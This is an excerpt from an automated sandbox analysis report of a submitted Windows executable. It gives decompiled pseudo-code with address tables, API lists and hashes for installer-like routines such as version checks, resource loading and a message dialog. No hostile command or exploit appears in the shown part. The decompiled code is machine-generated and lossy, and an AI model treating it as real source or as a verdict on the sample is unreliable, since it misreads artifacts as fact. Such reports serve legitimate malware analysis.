                                                                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                                                                                                              				_t106 = 0;
                                                                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				_t103 = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_t106 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t62 = 0;
                                                                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                              						if(E001A2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_t99 = _v16;
                                                                                                                                                                                                                                              							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                              							_t93 = _v24;
                                                                                                                                                                                                                                              							_t87 = _v20;
                                                                                                                                                                                                                                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                              							if(_t103 != 0) {
                                                                                                                                                                                                                                              								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                              								_v36 = _t73;
                                                                                                                                                                                                                                              								if(_t73 != 0) {
                                                                                                                                                                                                                                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                              										L15:
                                                                                                                                                                                                                                              										GlobalUnlock(_t103);
                                                                                                                                                                                                                                              										_t99 = _v16;
                                                                                                                                                                                                                                              										L18:
                                                                                                                                                                                                                                              										_t87 = _t87 + 1;
                                                                                                                                                                                                                                              										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										_v20 = _t87;
                                                                                                                                                                                                                                              										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L19;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t79 = _v44;
                                                                                                                                                                                                                                              										_t88 = _t106;
                                                                                                                                                                                                                                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                              										_t101 = _v28;
                                                                                                                                                                                                                                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                              										_t97 = _v48;
                                                                                                                                                                                                                                              										_v36 = _t83;
                                                                                                                                                                                                                                              										_t109 = _t83;
                                                                                                                                                                                                                                              										do {
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E001A2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E001A2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                              											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                              											_t88 = _t88 + 4;
                                                                                                                                                                                                                                              										} while (_t88 < 8);
                                                                                                                                                                                                                                              										_t87 = _v20;
                                                                                                                                                                                                                                              										_t106 = 0;
                                                                                                                                                                                                                                              										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                              											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                              												GlobalUnlock(_t103);
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												goto L15;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L20:
                                                                                                                                                                                                                                              				 *_a8 = _t87;
                                                                                                                                                                                                                                              				if(_t103 != 0) {
                                                                                                                                                                                                                                              					GlobalFree(_t103);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t106;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x001a28f1
                                                                                                                                                                                                                                              0x001a28f4
                                                                                                                                                                                                                                              0x001a28f7
                                                                                                                                                                                                                                              0x001a28f9
                                                                                                                                                                                                                                              0x001a28fc
                                                                                                                                                                                                                                              0x001a28ff
                                                                                                                                                                                                                                              0x001a2901
                                                                                                                                                                                                                                              0x001a2907
                                                                                                                                                                                                                                              0x001a2a62
                                                                                                                                                                                                                                              0x001a2a64
                                                                                                                                                                                                                                              0x001a290d
                                                                                                                                                                                                                                              0x001a290d
                                                                                                                                                                                                                                              0x001a290f
                                                                                                                                                                                                                                              0x001a2912
                                                                                                                                                                                                                                              0x001a2920
                                                                                                                                                                                                                                              0x001a2937
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2944
                                                                                                                                                                                                                                              0x001a294a
                                                                                                                                                                                                                                              0x001a294f
                                                                                                                                                                                                                                              0x001a2a2f
                                                                                                                                                                                                                                              0x001a2a32
                                                                                                                                                                                                                                              0x001a2a34
                                                                                                                                                                                                                                              0x001a2a37
                                                                                                                                                                                                                                              0x001a2a41
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2955
                                                                                                                                                                                                                                              0x001a295e
                                                                                                                                                                                                                                              0x001a2962
                                                                                                                                                                                                                                              0x001a2969
                                                                                                                                                                                                                                              0x001a296f
                                                                                                                                                                                                                                              0x001a2974
                                                                                                                                                                                                                                              0x001a298c
                                                                                                                                                                                                                                              0x001a2a20
                                                                                                                                                                                                                                              0x001a2a21
                                                                                                                                                                                                                                              0x001a2a27
                                                                                                                                                                                                                                              0x001a2a4c
                                                                                                                                                                                                                                              0x001a2a4f
                                                                                                                                                                                                                                              0x001a2a50
                                                                                                                                                                                                                                              0x001a2a53
                                                                                                                                                                                                                                              0x001a2a56
                                                                                                                                                                                                                                              0x001a2a5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a29b2
                                                                                                                                                                                                                                              0x001a29b2
                                                                                                                                                                                                                                              0x001a29b5
                                                                                                                                                                                                                                              0x001a29bd
                                                                                                                                                                                                                                              0x001a29c3
                                                                                                                                                                                                                                              0x001a29cc
                                                                                                                                                                                                                                              0x001a29d5
                                                                                                                                                                                                                                              0x001a29d7
                                                                                                                                                                                                                                              0x001a29da
                                                                                                                                                                                                                                              0x001a29dd
                                                                                                                                                                                                                                              0x001a29df
                                                                                                                                                                                                                                              0x001a29ec
                                                                                                                                                                                                                                              0x001a29f8
                                                                                                                                                                                                                                              0x001a29fc
                                                                                                                                                                                                                                              0x001a29ff
                                                                                                                                                                                                                                              0x001a2a02
                                                                                                                                                                                                                                              0x001a2a07
                                                                                                                                                                                                                                              0x001a2a0a
                                                                                                                                                                                                                                              0x001a2a0f
                                                                                                                                                                                                                                              0x001a2a19
                                                                                                                                                                                                                                              0x001a2a81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2a0f
                                                                                                                                                                                                                                              0x001a298c
                                                                                                                                                                                                                                              0x001a2974
                                                                                                                                                                                                                                              0x001a2962
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a294f
                                                                                                                                                                                                                                              0x001a2912
                                                                                                                                                                                                                                              0x001a2a65
                                                                                                                                                                                                                                              0x001a2a68
                                                                                                                                                                                                                                              0x001a2a6c
                                                                                                                                                                                                                                              0x001a2a6f
                                                                                                                                                                                                                                              0x001a2a6f
                                                                                                                                                                                                                                              0x001a2a7d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 001A2A6F
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: CharUpperA.USER32(56898003,00000000,00000000,00000000), ref: 001A27A8
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: CharNextA.USER32(0000054D), ref: 001A27B5
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: CharNextA.USER32(00000000), ref: 001A27BC
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2829
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2852
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2870
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A28A0
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,001A3938,?,?,?,?,-00000005), ref: 001A2958
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 001A2969
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,001A3938,?,?,?,?,-00000005,?), ref: 001A2A21
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 001A2A81
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3949799724-0
                                                                                                                                                                                                                                              • Opcode ID: 4c86b7db0c3ad12564e9801666ea76271fa143f8114571f0d3ab0d2c1ae7aee1
                                                                                                                                                                                                                                              • Instruction ID: bbb206410670899f9cbbb7aa8c7a8692cade60ce615b0b08b67e3ef0ab343824
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c86b7db0c3ad12564e9801666ea76271fa143f8114571f0d3ab0d2c1ae7aee1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B512A35E00219EFCB25DF98D884AAEFBB5FF49700F14416AE915E3621DB319E41DB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                                                                              			E001A4169(void* __eflags) {
                                                                                                                                                                                                                                              				int _t18;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = E001A468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                              					if(E001A468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							return LocalFree(_t21);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(0x40);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t21);
                                                                                                                                                                                                                                              						_t18 = 0x3e9;
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						E001A44B9(0, _t18);
                                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_t18 = 0x4b1;
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x001a417d
                                                                                                                                                                                                                                              0x001a418f
                                                                                                                                                                                                                                              0x001a4193
                                                                                                                                                                                                                                              0x001a41b7
                                                                                                                                                                                                                                              0x001a41d3
                                                                                                                                                                                                                                              0x001a41e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a41e7
                                                                                                                                                                                                                                              0x001a41d5
                                                                                                                                                                                                                                              0x001a41d6
                                                                                                                                                                                                                                              0x001a41d8
                                                                                                                                                                                                                                              0x001a41d9
                                                                                                                                                                                                                                              0x001a41da
                                                                                                                                                                                                                                              0x001a41df
                                                                                                                                                                                                                                              0x001a41e1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a41e1
                                                                                                                                                                                                                                              0x001a41b9
                                                                                                                                                                                                                                              0x001a41ba
                                                                                                                                                                                                                                              0x001a41bc
                                                                                                                                                                                                                                              0x001a41bd
                                                                                                                                                                                                                                              0x001a41be
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a41be
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001A30B4), ref: 001A4189
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001A30B4), ref: 001A41E7
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                              • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                              • Opcode ID: b4152335d46439f4b76aeb0e8736d8ea2a727242cc8a90fb0aa12ae0d8f4f79f
                                                                                                                                                                                                                                              • Instruction ID: 5c0c97890d841b72d9c9007abd311eab49e34f1f83809cc8fe25fbe88464dd22
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4152335d46439f4b76aeb0e8736d8ea2a727242cc8a90fb0aa12ae0d8f4f79f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01F4FD3002243BF7252A658C86F7B218EDFEB7A5F514025B705E15809BE8DC4141B5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A7155() {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct _FILETIME _v16;
                                                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                                                              				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed int _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                              				_t23 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                              					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                              					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                              					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                              					_t39 = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0xbb40e64e || ( *0x1a8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                              						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                              						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x1a8004 = _t39;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t37 =  !_t36;
                                                                                                                                                                                                                                              				 *0x1a8008 = _t37;
                                                                                                                                                                                                                                              				return _t37;
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x001a715d
                                                                                                                                                                                                                                              0x001a7161
                                                                                                                                                                                                                                              0x001a7165
                                                                                                                                                                                                                                              0x001a7178
                                                                                                                                                                                                                                              0x001a7182
                                                                                                                                                                                                                                              0x001a718e
                                                                                                                                                                                                                                              0x001a7197
                                                                                                                                                                                                                                              0x001a71a0
                                                                                                                                                                                                                                              0x001a71b1
                                                                                                                                                                                                                                              0x001a71b8
                                                                                                                                                                                                                                              0x001a71c4
                                                                                                                                                                                                                                              0x001a71c7
                                                                                                                                                                                                                                              0x001a71cb
                                                                                                                                                                                                                                              0x001a71d5
                                                                                                                                                                                                                                              0x001a71da
                                                                                                                                                                                                                                              0x001a71da
                                                                                                                                                                                                                                              0x001a71dc
                                                                                                                                                                                                                                              0x001a71dc
                                                                                                                                                                                                                                              0x001a71e2
                                                                                                                                                                                                                                              0x001a71e5
                                                                                                                                                                                                                                              0x001a71ee

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001A7182
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 001A7191
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 001A719A
                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 001A71A3
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 001A71B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                                              • Opcode ID: b196cb6d69bfd7031fb3d9d40812179e4a8a2b4bc9a0f0224093298a0c171415
                                                                                                                                                                                                                                              • Instruction ID: 73cf894743ccab6baa08a052632b90dbb181731eb0ec8dbe4775a2494d83794c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b196cb6d69bfd7031fb3d9d40812179e4a8a2b4bc9a0f0224093298a0c171415
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15113A75D01208EBCB10DFB8DA48A9EBBF4FF0A314FA14865E801E7250EB309B45CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v520;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                                                              				_t11 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                              				_t34 = _a4;
                                                                                                                                                                                                                                              				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                              					E001A43D0(_t34, _t15);
                                                                                                                                                                                                                                              					_v520 = 0;
                                                                                                                                                                                                                                              					LoadStringA( *0x1a9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                              					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if(_t14 != 1) {
                                                                                                                                                                                                                                              						L4:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t32 = _a12;
                                                                                                                                                                                                                                              						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							_t23 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x001a19e0
                                                                                                                                                                                                                                              0x001a19e0
                                                                                                                                                                                                                                              0x001a19eb
                                                                                                                                                                                                                                              0x001a19f2
                                                                                                                                                                                                                                              0x001a19f9
                                                                                                                                                                                                                                              0x001a19fc
                                                                                                                                                                                                                                              0x001a1a01
                                                                                                                                                                                                                                              0x001a1a2a
                                                                                                                                                                                                                                              0x001a1a2e
                                                                                                                                                                                                                                              0x001a1a3e
                                                                                                                                                                                                                                              0x001a1a4f
                                                                                                                                                                                                                                              0x001a1a62
                                                                                                                                                                                                                                              0x001a1a6a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1a03
                                                                                                                                                                                                                                              0x001a1a06
                                                                                                                                                                                                                                              0x001a1a20
                                                                                                                                                                                                                                              0x001a1a20
                                                                                                                                                                                                                                              0x001a1a08
                                                                                                                                                                                                                                              0x001a1a08
                                                                                                                                                                                                                                              0x001a1a14
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1a16
                                                                                                                                                                                                                                              0x001a1a18
                                                                                                                                                                                                                                              0x001a1a70
                                                                                                                                                                                                                                              0x001a1a72
                                                                                                                                                                                                                                              0x001a1a72
                                                                                                                                                                                                                                              0x001a1a14
                                                                                                                                                                                                                                              0x001a1a06
                                                                                                                                                                                                                                              0x001a1a81

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 001A1A18
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A1A24
                                                                                                                                                                                                                                              • LoadStringA.USER32(?,?,00000200), ref: 001A1A4F
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 001A1A62
                                                                                                                                                                                                                                              • MessageBeep.USER32(000000FF), ref: 001A1A6A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
